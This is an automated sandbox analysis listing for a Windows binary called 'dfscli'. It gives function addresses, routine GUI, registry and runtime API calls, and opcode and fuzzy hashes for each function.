                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$AllocLeaveLocalValue$Enter
                                                                  • String ID:
                                                                  • API String ID: 784703316-0
                                                                  • Opcode ID: 594a4808baee31a767fdc62f7c8140403948de5799d907349c6831314b1ca9d7
                                                                  • Instruction ID: 5dddc9971b22e0e1876c0446c64b268f5833d0c7886631e03ddba794b92d443b
                                                                  • Opcode Fuzzy Hash: 594a4808baee31a767fdc62f7c8140403948de5799d907349c6831314b1ca9d7
                                                                  • Instruction Fuzzy Hash: 52319A71700625EFDB20DF56E8C5CAABBA9FF48310B90863EE51A93610C734BD51CB98
                                                                  Function 0040CC2D Relevance: 10.6, APIs: 7, Instructions: 86windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindow.USER32(?,00000002), ref: 0040CC48
                                                                  • GetParent.USER32(?), ref: 0040CC59
                                                                  • GetWindow.USER32(?,00000002), ref: 0040CC7C
                                                                  • GetWindow.USER32(?,00000002), ref: 0040CC8E
                                                                  • GetWindowLongA.USER32(?,000000EC), ref: 0040CC9D
                                                                  • IsWindowVisible.USER32(?), ref: 0040CCB7
                                                                  • GetTopWindow.USER32(?), ref: 0040CCDD
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$LongParentVisible
                                                                  • String ID:
                                                                  • API String ID: 506644340-0
                                                                  • Opcode ID: c70ef7d8c11c9b3d2c2ff62202ba04e1108e68c61368e778a638a0a540840f3a
                                                                  • Instruction ID: 9a1c37ed5188bfc8f33535311d62c0bbdcb57dd72d5f2f5136bb94345a51e9fd
                                                                  • Opcode Fuzzy Hash: c70ef7d8c11c9b3d2c2ff62202ba04e1108e68c61368e778a638a0a540840f3a
                                                                  • Instruction Fuzzy Hash: 3D21B631704725EBE7316B66DC89F1B76AC9F44350F450A3AB906B72E1C63CEC0297A8
                                                                  Function 00429DD5 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • RegOpenKeyExA.ADVAPI32(80000001,software,00000000,0002001F,?,?,00000000), ref: 00429E03
                                                                  • RegCreateKeyExA.ADVAPI32(?,00000000,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00429E26
                                                                  • RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,0002001F,00000000,?,?,?,00000000), ref: 00429E42
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00429E52
                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00429E5C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCreate$Open
                                                                  • String ID: software
                                                                  • API String ID: 1740278721-2010147023
                                                                  • Opcode ID: 72d1def7f2d6fdd73a8869adbf3cb73964bbc3421da6f381463cdf1f6bf9f63c
                                                                  • Instruction ID: 4196c354c669fe93409805c9569d3fa6af76ca9127a827bb77615f6dc873523b
                                                                  • Opcode Fuzzy Hash: 72d1def7f2d6fdd73a8869adbf3cb73964bbc3421da6f381463cdf1f6bf9f63c
                                                                  • Instruction Fuzzy Hash: 6B11FB72E00268FBDB21DB96DD84DDFBFBCEF89750F50006AE504A2111D2719E05DB64
                                                                  Function 004051A3 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 62stringCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004051E1
                                                                  • GetSystemMetrics.USER32(00000000), ref: 004051F9
                                                                  • GetSystemMetrics.USER32(00000001), ref: 00405200
                                                                  • lstrcpynA.KERNEL32(?,DISPLAY,00000020), ref: 00405226
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: System$Metrics$InfoParameterslstrcpyn
                                                                  • String ID: B$DISPLAY
                                                                  • API String ID: 2307409384-3316187204
                                                                  • Opcode ID: 01cb16e888f42547f2c344bd68f40c19bd14a3463d0f9075f0a2184348a044af
                                                                  • Instruction ID: e98ffc39238d76ad18c2064865fb770f623c726fedb459cf3e2701fb3375c0a4
                                                                  • Opcode Fuzzy Hash: 01cb16e888f42547f2c344bd68f40c19bd14a3463d0f9075f0a2184348a044af
                                                                  • Instruction Fuzzy Hash: 8D11A371601624ABCF219F659C84A5BBBA8EF09740B8044B6FD05BE185D275D801CFE9
                                                                  Function 00427E43 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 58COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetMapMode.GDI32(?,00000000,?,?,?,?,00407746,?), ref: 00427E53
                                                                  • GetDeviceCaps.GDI32(?,00000058), ref: 00427E8D
                                                                  • GetDeviceCaps.GDI32(?,0000005A), ref: 00427E96
                                                                    • Part of subcall function 00425FE0: MulDiv.KERNEL32(00407746,00000000,00000000), ref: 00426020
                                                                    • Part of subcall function 00425FE0: MulDiv.KERNEL32(4689EC45,00000000,00000000), ref: 0042603D
                                                                  • MulDiv.KERNEL32(Fw@,00000060,000009EC), ref: 00427EBA
                                                                  • MulDiv.KERNEL32(00000000,?,000009EC), ref: 00427EC5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CapsDevice$Mode
                                                                  • String ID: Fw@
                                                                  • API String ID: 696222070-2650048193
                                                                  • Opcode ID: e3170947b1cc198c57297360878fe5df2dbdc7ddbbd9112fc42464f21816eb6e
                                                                  • Instruction ID: fb80d5ef7b3a5028a237277ba05e0f2eaaf9dab0768e1b579059bcf110595a45
                                                                  • Opcode Fuzzy Hash: e3170947b1cc198c57297360878fe5df2dbdc7ddbbd9112fc42464f21816eb6e
                                                                  • Instruction Fuzzy Hash: 1711C235700720AFDB219F55DC44C1FBBA9EF84750752042AF98157360C7759D02CB98
                                                                  Function 00422880 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 34libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00429F15: EnterCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F43
                                                                    • Part of subcall function 00429F15: InitializeCriticalSection.KERNEL32(00000000,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F55
                                                                    • Part of subcall function 00429F15: LeaveCriticalSection.KERNEL32(0043F21C,?,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF), ref: 00429F5E
                                                                    • Part of subcall function 00429F15: EnterCriticalSection.KERNEL32(00000000,00000000,?,?,00429937,00000010,76230A60,00000000,?,?,?,004295F9,004295AC,00428940,004295FF,0041F399), ref: 00429F70
                                                                    • Part of subcall function 00429916: __EH_prolog.LIBCMT ref: 0042991B
                                                                  • LoadLibraryA.KERNEL32(hhctrl.ocx,004290F1,0000000C), ref: 004228A4
                                                                  • GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 004228B7
                                                                  • FreeLibrary.KERNEL32(?), ref: 004228C7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLibrary$AddressFreeH_prologInitializeLeaveLoadProc
                                                                  • String ID: HtmlHelpA$hhctrl.ocx$|C
                                                                  • API String ID: 813623328-2960013086
                                                                  • Opcode ID: 76f3623a875863b6600950783369de3e50677ae7417989a49c3df338fd27278c
                                                                  • Instruction ID: 8ff148b5d027a1bd9c09299d9886496cc310a26e86ad88824c01f6ca9606dbec
                                                                  • Opcode Fuzzy Hash: 76f3623a875863b6600950783369de3e50677ae7417989a49c3df338fd27278c
                                                                  • Instruction Fuzzy Hash: A6F04430344311EFD7606F72EE09B177AD4AF08B15F40892EF05BD15A0DBB8C844972A
                                                                  Function 0042547E Relevance: 10.5, APIs: 7, Instructions: 29COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSysColor.USER32(0000000F), ref: 0042548A
                                                                  • GetSysColor.USER32(00000010), ref: 00425491
                                                                  • GetSysColor.USER32(00000014), ref: 00425498
                                                                  • GetSysColor.USER32(00000012), ref: 0042549F
                                                                  • GetSysColor.USER32(00000006), ref: 004254A6
                                                                  • GetSysColorBrush.USER32(0000000F), ref: 004254B3
                                                                  • GetSysColorBrush.USER32(00000006), ref: 004254BA
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Color$Brush
                                                                  • String ID:
                                                                  • API String ID: 2798902688-0
                                                                  • Opcode ID: 5e9fe926aba121c93cda4fa03a08df81998be73ca4ec86a4fc7898ccbcd5bfd0
                                                                  • Instruction ID: 78561b53b6dc26605db7459fdb8494e68ce8eabe85823d8095c3e3f311011118
                                                                  • Opcode Fuzzy Hash: 5e9fe926aba121c93cda4fa03a08df81998be73ca4ec86a4fc7898ccbcd5bfd0
                                                                  • Instruction Fuzzy Hash: 2BF0F871A407489BD730BB729D09B47BAE1FFC4B10F02092EE2818BA90E6B6E0419F44
                                                                  Function 00427ED1 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 24registrywindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Version$MessageRegisterWindow
                                                                  • String ID: MSWHEEL_ROLLMSG
                                                                  • API String ID: 303823969-2485103130
                                                                  • Opcode ID: 05bd7beb7a7556ba018a9a177a96ae2ca3a30c583be59b7c1ae453c514f770bd
                                                                  • Instruction ID: cf2be246d5d97fda33aa8db455070e9bef683d48ca9bcd61a13d8190e2691888
                                                                  • Opcode Fuzzy Hash: 05bd7beb7a7556ba018a9a177a96ae2ca3a30c583be59b7c1ae453c514f770bd
                                                                  • Instruction Fuzzy Hash: 38E0803AA0D13546D7116764BE4476B66A45B54361FD6007BC90143764976C0C878A7E
                                                                  Function 0040EF6B Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 13libraryloaderCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(mscoree.dll,0040F0D9,?,00431AC0,00000008,0040F110,?,00000001,00000000,00412FBC,00000003), ref: 0040EF70
                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040EF80
                                                                  • ExitProcess.KERNEL32 ref: 0040EF94
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: AddressExitHandleModuleProcProcess
                                                                  • String ID: CorExitProcess$`#vp,$v$mscoree.dll
                                                                  • API String ID: 75539706-2710989135
                                                                  • Opcode ID: fd8063930fbf66e5889c8e5221376f06f177b086132e45f551b3fdf05346e537
                                                                  • Instruction ID: 941fb14b8e6e74046c3674dea832eee8b0a2cfa7b7099c50836eeb20d6140e2c
                                                                  • Opcode Fuzzy Hash: fd8063930fbf66e5889c8e5221376f06f177b086132e45f551b3fdf05346e537
                                                                  • Instruction Fuzzy Hash: 0FD0C730705301BFD7106B63DC0DF1A3A58AE44B05B485D357446D01B0CF74C851E52D
                                                                  Function 0040C22B Relevance: 9.4, APIs: 6, Instructions: 384COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040C230
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C292
                                                                  • VariantClear.OLEAUT32(00000007), ref: 0040C5C0
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C735
                                                                    • Part of subcall function 0040D77F: VariantCopy.OLEAUT32(?,?), ref: 0040D787
                                                                    • Part of subcall function 00408A64: SystemTimeToVariantTime.OLEAUT32(?), ref: 00408AB2
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C715
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$Clear$Time$CopyH_prologSystem
                                                                  • String ID:
                                                                  • API String ID: 2075586698-0
                                                                  • Opcode ID: 1364f7f1f86d658b4d6e8cd494515ac68c753655f9690c10ced3c2c88684c333
                                                                  • Instruction ID: 6ab10ce611a99a1f8f361261b98790ac6c7d0aa24a7c23b9a0ac30f561102aa8
                                                                  • Opcode Fuzzy Hash: 1364f7f1f86d658b4d6e8cd494515ac68c753655f9690c10ced3c2c88684c333
                                                                  • Instruction Fuzzy Hash: BCE12B7580011CEACF15EB94C991AFEBB79BF18304F0441ABF845B32D1EB385A49DB69
                                                                  Function 004155CE Relevance: 9.1, APIs: 6, Instructions: 145COMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetStringTypeW.KERNEL32(00000001,004322C4,00000001,?,004322F0,0000001C,0040FB4A,00000001,00000020,00000100,?,00000000), ref: 004155F2
                                                                  • GetLastError.KERNEL32 ref: 00415604
                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,00000000,0040FE1B,00000000,00000000,004322F0,0000001C,0040FB4A,00000001,00000020,00000100,?,00000000), ref: 00415666
                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,00000000,0040FE1B,?,00000000), ref: 004156E4
                                                                  • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,00000000), ref: 004156F6
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiStringTypeWide$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 3581945363-0
                                                                  • Opcode ID: 1d6e66a6560f70aff42be1d47028f91ef8b4c7634ef11d4c805a64f0cb85e88e
                                                                  • Instruction ID: a1f57d75a495807adbd5f9f81b07e7c36f1fa25e7f2b40525a61db36998abfa5
                                                                  • Opcode Fuzzy Hash: 1d6e66a6560f70aff42be1d47028f91ef8b4c7634ef11d4c805a64f0cb85e88e
                                                                  • Instruction Fuzzy Hash: CC41E231900A15EBCF219F51DC46EEF7B75FF88760F14052AF814A6290D7388991DBE8
                                                                  Function 0040C753 Relevance: 9.1, APIs: 6, Instructions: 137COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 0040C758
                                                                  • VariantClear.OLEAUT32(?), ref: 0040C80A
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C88B
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C89A
                                                                  • SysFreeString.OLEAUT32(00000000), ref: 0040C8A9
                                                                  • VariantClear.OLEAUT32(00000000), ref: 0040C8BE
                                                                    • Part of subcall function 0040C22B: __EH_prolog.LIBCMT ref: 0040C230
                                                                    • Part of subcall function 0040C22B: VariantClear.OLEAUT32(?), ref: 0040C292
                                                                    • Part of subcall function 0040D77F: VariantCopy.OLEAUT32(?,?), ref: 0040D787
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Variant$ClearFreeString$H_prolog$Copy
                                                                  • String ID:
                                                                  • API String ID: 3098219910-0
                                                                  • Opcode ID: 979a942dbc2bf8fde55d4df949cd0def5ce3ee024a13b008bae821c373d48dc3
                                                                  • Instruction ID: 36662450c5e1947f06e528152222194ba2e0adfdc782b58db195a1114ff86cd1
                                                                  • Opcode Fuzzy Hash: 979a942dbc2bf8fde55d4df949cd0def5ce3ee024a13b008bae821c373d48dc3
                                                                  • Instruction Fuzzy Hash: 33512AB1A00209DFDB24DFA4C884BEEB7B8FF44305F10462EE516E7291D778A945CB68
                                                                  Function 00426ED9 Relevance: 9.1, APIs: 6, Instructions: 68COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetWindowLongA.USER32(?,000000F0), ref: 00426F0B
                                                                  • GetParent.USER32(?), ref: 00426F19
                                                                  • GetParent.USER32(?), ref: 00426F2C
                                                                  • GetLastActivePopup.USER32(?), ref: 00426F3B
                                                                  • IsWindowEnabled.USER32(?), ref: 00426F50
                                                                  • EnableWindow.USER32(?,00000000), ref: 00426F63
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Parent$ActiveEnableEnabledLastLongPopup
                                                                  • String ID:
                                                                  • API String ID: 670545878-0
                                                                  • Opcode ID: e6b9fbe2978fe384cc6369b478063f7d970489e6a0ea732f4327e87d7b57f048
                                                                  • Instruction ID: 07f23732e05c0ddae676fdba191ad6f2f3c3259ccd052a946048ec3c933e7ffc
                                                                  • Opcode Fuzzy Hash: e6b9fbe2978fe384cc6369b478063f7d970489e6a0ea732f4327e87d7b57f048
                                                                  • Instruction Fuzzy Hash: 0411063230823157CE316A5A7E40B2BB29C5F68B50FC7002BED10D3304EB28CC0246DD
                                                                  Function 004266BB Relevance: 9.0, APIs: 6, Instructions: 45COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 004266CA
                                                                  • GetDlgCtrlID.USER32(00000000), ref: 004266DE
                                                                  • GetWindowLongA.USER32(00000000,000000F0), ref: 004266EC
                                                                  • GetWindowRect.USER32(00000000,?), ref: 004266FE
                                                                  • PtInRect.USER32(?,?,?), ref: 0042670E
                                                                  • GetWindow.USER32(?,00000005), ref: 0042671B
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
                                                                  Similarity
                                                                  • API ID: Window$Rect$ClientCtrlLongScreen
                                                                  • String ID:
                                                                  • API String ID: 1315500227-0
                                                                  • Opcode ID: 59508210cca9db84bfe781cdbc9e2c47ff541434b0194dd008954dc1c14c9765
                                                                  • Instruction ID: 83608b20ab5d7acfc5f4007f6359faa5a2816e21795921f9c93a6bd5c83018c8
                                                                  • Opcode Fuzzy Hash: 59508210cca9db84bfe781cdbc9e2c47ff541434b0194dd008954dc1c14c9765
                                                                  • Instruction Fuzzy Hash: 2F018F35300125ABDB21AF56AC08EAF3B68AF44751F810026F91193190DB34D9028BA8
                                                                  Function 00415BE4 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000002.00000002.2116515588.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000002.00000002.2116483087.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116539321.000000000042E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116565364.000000000043F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 00000002.00000002.2116987530.0000000000441000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_2_2_400000_dfscli.jbxd
